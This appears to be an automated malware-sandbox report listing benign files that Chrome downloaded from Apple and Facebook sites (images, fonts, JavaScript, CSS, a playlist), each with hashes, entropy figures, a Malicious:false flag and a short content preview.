                                                                                                                                                                                                                                MD5:7659F09C75B5BC572384B6DB3154F5C3
                                                                                                                                                                                                                                SHA1:F493682903E175C5F1A08D14CF8846B8C6EC18B7
                                                                                                                                                                                                                                SHA-256:5933627C22BDBB77791361631AB1ADA2C9437314233C714AFA455D38556980F8
                                                                                                                                                                                                                                SHA-512:092491AFB0B6DF252DFBA5F29BA9F3AA5A9D918FDCF2CA514A51F54E6A454382B780B7C8B6DA9C20DC44377A075F43F40032135F4D4D582E66A661C0A4793DE0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/button_glyphs/video_control_volume_muted_white-7659f09c75b5bc572384b6db3154f5c3.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB........\IDATX...=/.A....$..-.q.j.j_@8..O ..K......J).$..Ph..I.r.u.+n...7...lc..N.M..q.\....Q`...a.h....x.T..c....5...F2..a_:.z.;...D.X$..d:..d.....p..9.2...U.MV..D.*.....=I5..G<.."."...w...-K..*....R.....9.#..$.O.......F^.9|...,..%0$w#.,.M.D......"w.....5N..R.......QM2.2..U.n .d...wi.....-...|.M.b...4....&.\.....[dAlF_...\KzQ..L.Aq.\....@&..J.nF....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 171 x 56, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):3535
                                                                                                                                                                                                                                Entropy (8bit):7.537698484459483
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:1sN9UcmQiiq5kRFWjqyjsJql4Ug30V1mYP9QHEZNWd02XAeivOo+myviJ/0n52mB:1ErFWB+Un7jP9QANWd7/8+m1ccY/
                                                                                                                                                                                                                                MD5:432139435250177A033CD2D1778D2883
                                                                                                                                                                                                                                SHA1:280992DC9962F26E711F3B982D27B154770D0CE5
                                                                                                                                                                                                                                SHA-256:EDDA9B189A90EFF4209A0295E64FBAFBA2D44801ED471BF8263D277845C22BD1
                                                                                                                                                                                                                                SHA-512:ACD97392DF5F74FE3A3BEA2A8D20467A8367FEB1C797B021363A7D1995AE9644680EC81E32D169E83B5A205A66A4DB999A27D6481BF29CF8C1AFFD8C234DA19C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/YwPTeE82t1h.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......8.............PLTEGpL........................................................................................................................................................................................................................................................................1P.......................................................:X.........................9X.:X...................:X.7V................:Y.:X. @.:X.:X.7T....:X.:X.+U.:X.5S.9U.:X....:Y.:X.:Y.:X.7Y.;X.;X.;X.:X.3D.9X.9W...........h.;Y.nA....WWWbixdkzPPPT[j^etV]lgn}..I.~2.q".{0.x,Zap..N..>........s...D.............P................p .........q.U....k.[...........~.q.........^.z....tRNS..F........&....2.....H.<h..,.^.....*f0$....`"(...\..:P..r..@4.j.T..R... .LzZ.n....V..b.6p8.......JN..>..dt..B.l..p.x|..D.*X~.v.....#.......`..l....z..0^.......NIDATx^.gO#I.....g.'...`..o..69.....%.....A...^>_..Q......{a.t..UOuU.o.rM.@..AC..i?..Bm.&.T&.5Iu'.......M.su.&..}.T..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1566)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):41276
                                                                                                                                                                                                                                Entropy (8bit):5.2368089739293495
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:EkxiX+skUbNIvnXh5hC+gSyJNbX+V4N8zuZYJOKLNWDjqcR5cXcpcO0cDcIvScTu:lskUbNIvnX7hC+MNhZYVNWDjRE3
                                                                                                                                                                                                                                MD5:CF98EF659A7C40F16FB89858EE051693
                                                                                                                                                                                                                                SHA1:F223F862E3DC2347DEC54A932E35C5BC5F794C8D
                                                                                                                                                                                                                                SHA-256:D1DAC8F97C25357AE55BB0FF7EFAB6349022317CFBC549BB2057C15ED2DD337D
                                                                                                                                                                                                                                SHA-512:58043EF2BA149E03964670CA8A2FB8039691129058FB95D29851F84E7D65F66270B5ECBED675D56E871D6722B959FF3AA7ED2672E1E3E89B6F071A90B120C7E4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.706.4a437bd91dd079e92306.js
                                                                                                                                                                                                                                Preview:(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[706],{43862:function(t){"use strict".t.exports=Object.freeze({ELEMENT:1,TEXT:3,COMMENT:8,DOCUMENT:9,DOCUMENT_TYPE:10,DOCUMENT_FRAGMENT:11})},96339:function(t,e,i){"use strict".var n=i(38694).t.exports=function(t,e){return n.insertNode(t,"insertBefore"),n.childNode(e,"insertBefore"),n.hasParentNode(e,"insertBefore"),e.parentNode.insertBefore(t,e)}},38694:function(t,e,i){"use strict".var n=i(37844),s=i(43862),r=s.COMMENT,a=s.DOCUMENT_FRAGMENT,o=s.ELEMENT,h=s.TEXT,c=[o,h,r,a],u=[o,h,r],l=[o,a].t.exports={parentNode:function(t,e,i){if(i=i||"target",t&&!n(t,l))throw new TypeError(e+": "+i+" must be an Element, or Document Fragment")},childNode:function(t,e,i){if(i=i||"target",t&&!n(t,u))throw new TypeError(e+": "+i+" must be an Element, TextNode, or Comment")},insertNode:function(t,e,i){if(i=i||"node",t&&!n(t,c))throw new TypeError(e+": "+i+" must be an Element, TextNode, Comment, or Document Fragment")},
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (32588)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):82019
                                                                                                                                                                                                                                Entropy (8bit):5.75815842860286
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:mtw5hvigCLIGBPIim0sKymy8W2Cu20u6SMiNckCuvw4Im+gSUQJywmO8SQ:AIYLI0PIim0sKymy8W2Cu20u6gCuvw4l
                                                                                                                                                                                                                                MD5:04EB01E703BC623D3F6E42D711DBD908
                                                                                                                                                                                                                                SHA1:DB5243F2BB2142983BD3794E36DAEE6D186C6EDE
                                                                                                                                                                                                                                SHA-256:029D5D5363C4A3A6D4175D60BE60CA6B58CDF71CB91D059B3AD16AE9C5B3CAC8
                                                                                                                                                                                                                                SHA-512:9668CFB29C176DA1BFF9DC66FEC700D5FF2FB33127D48CAD38EFA2070CD7CCA5AA1B9D55399FFD19604AA89F03B2A8D2882A7276E460EA5EF3AE094ABCD6CFF1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;while(a&&a.getAttribute){var e=a.getAttribute("id");if(e!=null&&e.startsWith("pagelet_"))return e;!d&&c[e]&&(d=e);a=b("getContextualParent")(a)}return d}a={addModuleData:function(a,b){b=i(b);b&&(h(a),a.nctr._mod=b)}};e.exports=a}),null);.__d("AsyncRequestNectarLogging",["AsyncRequest","Nectar"],(function(a,b,c,d,e,f,g){Object.assign(c("AsyncRequest").prototype,{setNectarModuleData:function(a){this.method=="POST"&&d("Nectar").addModuleData(this.data,a)}})}),34);.__d("DamerauLevenshtein",[],(function(a,b,c,d,e,f){function a(a,b){if(a.length===0)return b.length;if(b.length===0)return a.length;if(a===b)return 0;var c,d,e=[];e[0]=[];e[1]=[];e[2]=[];for(d=0;d<=b.length;d++)e[0][d]=d;for(c=1;c<=a.length;c++)for(d=1;d<=b.length;d++){e[c%3][0]=c;
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9961)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45856
                                                                                                                                                                                                                                Entropy (8bit):5.377886737524556
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:JXXiX4/HZecX8WlUPWnRFXJbflLtmvbPRAS3mjAvxfdxYOVl/tS:JCrcX8WlU8tltgpAS3mjyV+ElS
                                                                                                                                                                                                                                MD5:476E8FABA1D7ADCD9E496FD9DC33B3C4
                                                                                                                                                                                                                                SHA1:F21B31317EB534E73E5BFDD72F0583E6D8A5B06D
                                                                                                                                                                                                                                SHA-256:716DB07ADC0E1F7318B14C1BE0EA61F84969E1B5A3562AE7366FB189383BF038
                                                                                                                                                                                                                                SHA-512:B8371737A4428D3DC81A3C600BC8468780E5586371F107FFB739E22BD1144EFC764090850D81543E963884B9AA19CB708ED130D1F3B0DF6BE1955E4CE388A27B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:(i++).toString(36)}),this.$3=[]}var c=a.prototype;c.getID=function(){return this.$2.id};c.begin=function(){this.$2.begin=b("cr:9985")();return this};c.end=function(){this.$2.end=b("cr:9985")();return this};c.appendChild=function(){var a=this;this.$1&&h(0,37302,this.$2.description);for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];c.forEach(function(b){a.$3.push(b.getID())});return this};c.setPosted=function(){this.$1=!0;return this};c.getPostData=function(){return babelHelpers["extends"]({},this.$2,{id:this.$2.id,children:this.$3.slice()})};return a}();g["default"]=a}),98);.__d("ArtillerySequence",["invariant"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"description"in a||h(0,1497,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6090
                                                                                                                                                                                                                                Entropy (8bit):5.287646330709327
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:kfrWTuVTO9TWTsTFTbTuTvTJTF5TuTiTTbTMTaTETSTDTuTHTcTBTcTB+ThPTvTt:WyT6TO9TWTsTFTbTuTvTJTF5TuTATbTr
                                                                                                                                                                                                                                MD5:03A005894A934EC37110D79A2E93D21B
                                                                                                                                                                                                                                SHA1:315AC4C36EC9AC2BDA26CB86D163125D5F8B6CFA
                                                                                                                                                                                                                                SHA-256:3CECFCD00F302182EB21CFBFD1FF878C74A45E44AA003873FE67EDFBD3215AB8
                                                                                                                                                                                                                                SHA-512:ADB0BB7595B98ED5DAD16EBB7A2275D258B6CABAED4A954DC50501E43226D9BC822AF23E665B419F8744FC6B91295B4AE50841F1C56CF47113743184B3B42104
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:10.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-I-FRAMES-ONLY.#EXT-X-MAP:URI="P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4",BYTERANGE="897@0".#EXTINF:0.50000,..#EXT-X-BYTERANGE:12490@897.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12779@13387.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:11674@26166.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12472@37840.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12632@50312.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12607@62944.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12862@75551.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EXT-X-BYTERANGE:12277@88413.P875466468_Anull_trickPlay_gr210_sdr_342x740-.mp4.#EXTINF:0.50000,..#EX
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 108468, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):108468
                                                                                                                                                                                                                                Entropy (8bit):7.997835393798081
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3072:pWhXrpbCa6gSWYdNt9aYKHEX2a2k+kgylVi5nh9B:QhXYaGNR5ynyl49B
                                                                                                                                                                                                                                MD5:5011345B7AEB8F847CAEF745BB1B464E
                                                                                                                                                                                                                                SHA1:B37CE84520A2B9607E19BC0FC9CC7B841BC1C831
                                                                                                                                                                                                                                SHA-256:27464F709D857A113F9AC53FA038A3F61FD0059F9EF4BD48A58C41EDBFCDD996
                                                                                                                                                                                                                                SHA-512:BA5775614D07C16CB98625833EB3B3D381BD14278AEEA16A9F114FCCE1FD903F7264C76C135F069BCDA4E3936A64A10F103F32F62B0A4AD50CF6F209CF3ECAE8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Text/v2/sf-pro-text_bold.woff2
                                                                                                                                                                                                                                Preview:wOF2..............y....Q...........................$..H.`*H...>...4..c.6.$..$..(.. ?meta....(. 8.t[.x.F.m.n..I.....*[G4..&.{.3............x.....+..8.vY.I...........y....;f..;.K..(.D.*(...r..Z2..VTk.R6.......09..9.&.i.URN....f..n.@+..&[."...."ke.5L..r.E.....fd.|..nJt)..2.....u..`.*k....:3mb...OZQ.Gs..~..bv.......?..,.....R%..j)._....b#.v..#1./.....t.+v..O..5.xe..Na.......y3.?v...R}.kO...[.le...(.>........F...2.3f.9a......)%d.s.2....9.....7..f....H...+aC..F..c..R.?..L.?.f1...uT.-..z.....\e.Q.c.q.W3$*..b.P?F.]......&....TM...+Q.;..4i.DJ!)V..AQ..~?....N.xS...V!.A.`..0....[.."...&...g...V%U2.|..B..T.....i..!....g.~..oe)'.....F94....Y....x.9./&.m..h.7..W..\M4.n...7Q.*.`Z..t.....n..`...B.{qu<.;.......L..]...(..8....u.......v.A. ..Iz...qr!7......o......A.....<..........."....=...N?...". D.-4H....!..'..7;.w7.8x{..Rq.yH...qT....."..... ..8.?.TK......>.T...Rb...J).Ak.....vB.sw.....V.8.!dMR.2.....R..........,k..Dp"8Q...%.bk..v.../R.M.9.IO..I..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4202)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):30222
                                                                                                                                                                                                                                Entropy (8bit):5.3852991755826904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:uzL2OO5GMNYG+gQFNDigSfAyX+ssRGCmskmjBectkSCgBDwaHv+2R:KO5oo4msvjBectkSCgBDLR
                                                                                                                                                                                                                                MD5:3E9450428D4EBCBBA89CC5DB23F28451
                                                                                                                                                                                                                                SHA1:8584E548871D67DCAD6D9BD47CCEE87F117FC2D0
                                                                                                                                                                                                                                SHA-256:55904C53A0A5F0FB80766455E0E10819E386F061F4240068ED5B96D85773443C
                                                                                                                                                                                                                                SHA-512:A6ACED214473157A7E9F168B5389B8260420A6834F5B6A6ED762752D73CAB694926794576EA5D2F465AC04A575A2D2BE7615F8F70B428CE7A439848D8CE093A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/KuH9BoeRDxR.css"
                                                                                                                                                                                                                                Preview:._38vo{position:relative}._605a ._38vo:not(._1x2_):after,._5eit ._38vo:not(._1x2_):after{border-radius:50%}._605a ._7mi8:not(._1x2_):after{border-radius:8px}._38vo:after{border:1px solid rgba(0, 0, 0, .1);bottom:0;content:'';left:0;position:absolute;right:0;top:0}._44ma{display:block}._354z{background-color:#42b72a;border:2px solid #fff;border-radius:50%;height:9px;left:76%;position:absolute;top:68%;width:9px;z-index:1}.@media (max-height: 399px){._21do{position:static}}._7f-{color:#fff;line-height:20px}._7f- ._7g0 .uiTypeahead,._7f- ._7g0 .uiTypeahead .wrap{background-color:#4a4a4a;border-color:#4a4a4a}._7f- ._7g0 .textInput{color:#a6a6a6}._7g7 ._7g0{display:block}._7g0{display:none}._7g0{float:left;width:250px}.._64nf{background-image:url(/rsrc.php/v3/yc/r/Sn4CvhyHsmp.png);background-repeat:no-repeat;background-size:auto;background-position:0 -308px;height:16px;margin-left:2px;width:16px}._64nf._5dzz{width:16px}.profileLink ._64nf,._2u0z ._64nf,._5vra ._64nf,._52eh ._64nf{position:re
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (14008)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80554
                                                                                                                                                                                                                                Entropy (8bit):5.472094188360212
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:WgOvE4SMUyM00qiV+1qW7GNNXHMJhFOuUATsUDuRZskq6vSIghFQe:2OKMV5/qe6CRs
                                                                                                                                                                                                                                MD5:FDB9C1F20F28A8D325381794CAC0DB44
                                                                                                                                                                                                                                SHA1:B15729F3CBE270C665E35C7A7B53552592F393F6
                                                                                                                                                                                                                                SHA-256:5EBBB25432E3F899E1A55AAC5E35F7DD1EB35F83068311CB521035F09AC6366D
                                                                                                                                                                                                                                SHA-512:DE872F58E30CE70DD92AC91741644E7D077A83252CE4328DF825AC48F97D0B9E673E6D5C55E11DE8952545D4577AAB20988887299B9315649D0E1646BAB0904D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ARIAComboboxNotify",["fbt","ARIA","UserAgent"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!c("UserAgent").isPlatform("Mac OS X");function a(a){if(a&&!i){var b=a.getTitle();a=a.getSubtitle();d("ARIA").notify(a?b+", "+a:b);return!0}return!1}function b(a){a=h._({"*":"Found {number} results","_1":"Found 1 result"},[h._plural(a?a.length:0,"number")]);d("ARIA").notify(a)}g.maybeNotifyHighlightedEntry=a;g.notifyFoundEntries=b}),226);.__d("AbstractTokenizer.react",["cx","cr:4057","cr:6052","cr:7934","emptyFunction","getActiveElement","joinClasses","react"],(function(a,b,c,d,e,f,g){var h,i=h||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(){var c,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(c=d=a.call.apply(a,[this].concat(f))||this,d.$1=i.createRef(),d.$2=i.createRef(),d.state={queryString:"",lastQueryString:d.props.queryString},d.focusInput=function(){d.$1.current!=null&&d.$1.current.focusInput()}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12099)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):102096
                                                                                                                                                                                                                                Entropy (8bit):5.43834791286702
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:JS2wC8hEcI1cX3AIegU85BKGeRjWOkVJA+ai4hv9DGONOvV/l6t:JS2wbEiXhBX9VJA+ai0Dm76t
                                                                                                                                                                                                                                MD5:9160753CB23E3342F385303C74566261
                                                                                                                                                                                                                                SHA1:73E7493D5355E1430C5B7CFF4199A7D3F211C108
                                                                                                                                                                                                                                SHA-256:CE49776F72844EF1A206FF41F7282C50D20B8D8CAB409A98CD31AE0F5A514455
                                                                                                                                                                                                                                SHA-512:A42A7E96518717C54FD1B90B3425781D4C34C22C1CAA353D490E3270578BBB7FEFCDBFA2638B98B8CA037B3E22DC7A301FEC51B618EFDF97311825B926D6A054
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);.__d("BaseContextualLayerDefaultContainer.react",["LegacyHidden","react","stylex","testID"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||d("react");b=j.forwardRef(a);function a(a,b){var d=a.children,e=a.hidden;a.presencePayload;var f=a.stopClickPropagation,g=a.testid;a=a.xstyle;return j.jsx(c("LegacyHidden"),{htmlAttributes:babelHelpers["extends"]({},c("testID")(g),{className:(h||(h=c("stylex")))(a),onClick:f===!0?function(a){return a.stopPropagation()}:void 0}),mode:e?"hidden":"visible",ref:b,children:d})}a.displayName=a.name+" [from "+f.id+"]";e=b;g["default"]=e}),98);.__d("BaseContextualLayerLayerAdjustmentContext",["react"],(function(a,b,c,
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):81561
                                                                                                                                                                                                                                Entropy (8bit):5.343746592742468
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:RJeUwT76HXhpwNCHM9ZK0BK01QJnYTZ02LKVsdmpyKcicMky:RIT7OXDs9ZKAKBtYj8wKcHM3
                                                                                                                                                                                                                                MD5:93BBEFE809CA6D13CE9D268992A2CCB9
                                                                                                                                                                                                                                SHA1:A48527C92D40BA399BA05F884B74750AF08F4524
                                                                                                                                                                                                                                SHA-256:E478089461CCB3C99FFFA89D04E02A48A7DB163A211C42CF36C4CEFBD6511F22
                                                                                                                                                                                                                                SHA-512:5B4C85F285D834FDB889B0171FB00C54C0B28C6E53C1B41045747CBD9E05A0F8C9858406C8394F6F532F129FF6652A360AF945951EEB2E12503F18B585792FE4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://connect.facebook.net/signals/config/1668333663438923?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60480
                                                                                                                                                                                                                                Entropy (8bit):7.992771748727747
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:SLcrFugifZEGYhQonloubhMfudUfkcCx2c3mtgq5:NrFugUCuubqf7c3u
                                                                                                                                                                                                                                MD5:914101224F8E0D9A237FE51CD6C1FD5A
                                                                                                                                                                                                                                SHA1:C762FDF91D7BB16DB8D8BC80A1062E4461F8C7BA
                                                                                                                                                                                                                                SHA-256:4D00F71E7BD6EA654B03F21A81787D2E60F628C785F5D0BF962A25CC94C3681B
                                                                                                                                                                                                                                SHA-512:3E0AA2765CE168E008138E397D9CC47B75F899A1E53D4F3EA7ABD53ED4F0F716F50592CC12DB422F967D3BD32E279C858E85DB8C3B7BF13CDB70E1259E7C7583
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF8...WEBPVP8X..............VP8L..../..2.M.l.n.`-...u0...K..|G.....~....q...:..,...2...E.C..o...8.~.........../8..C....!.......C. .d..P.XK..0.....@.3A......@.)``.m..vT..(Pn..,.%..6.b..u...f.....7|.~SO.)....vS.z?..u/..3f...r.Z..-}=.2.w.^........R...f...R...~G....T.k..r....>.^.rJ..].....y.S.....lK.X.U..\=4..w+.Y.).._.;.......^*D.....9...ms[I.B..1..lLQ..=9..t5+.%...*.l.0.0B.BP.mm.<.$3......Y....d...N"...O..o.P......<..]....:!..4.B........*......>.L._..wUwUw......._...._6+..W.~..6.|.u.....gz.L....Wz.L.|...z.B.|.?.Z>.]U.KK...^$;.....P......^>..g*..3E.}..^..'....Z>...k.I.Y%%Y.,.,.....VV.@......*..=.....@f./.X..=....;....s......@.....<. ...@..L.....W`.r..q.q.8........d$.@AF62 ..@ #...^.2.Q....@<....p....8h..)...<..M....@.....#..2............OW&.3......T..*R.......w.f....P...P...".....Y.^4.1..O...z..@.#0..;6.......;<<..|.....q...\..[...*B.#..../.#...m}nT..g. .' ....rZ.i....U.gE.XzJ.[<.t5s..j....9.|..Sl...8.7.....}w..]v.........~..VM.%.a0..q..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10204), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10204
                                                                                                                                                                                                                                Entropy (8bit):5.282533445396263
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:U38kcmi3U2hQctc1cJcpcZrEccxNsMlcTctcIceCgycLcvXRkEsYNtGr:U38ZZU2hxtc1cJcpclEHllcTctcIc3gP
                                                                                                                                                                                                                                MD5:97E3F38781BA136C719D08CA0EC5162F
                                                                                                                                                                                                                                SHA1:5604E5C9095068500FD764E4E7608CD489D272CC
                                                                                                                                                                                                                                SHA-256:9DC2DC3E987AC76A2AE4DCC3A4DE7BF5D09DEACD4780C9F8BA7EC263380809CF
                                                                                                                                                                                                                                SHA-512:0716DD98795D9184A7A1508B87F9D17FAE217CC0364D42D075AF5D4C6BC1FD37E6FC07C4F6798D96AF028608075666D133C15977F38F8748421586BB9833E507
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/global-elements/2426.0.0/en_UZ/ac-global-footer.97e3f38781ba136c719d08ca0ec5162f.js
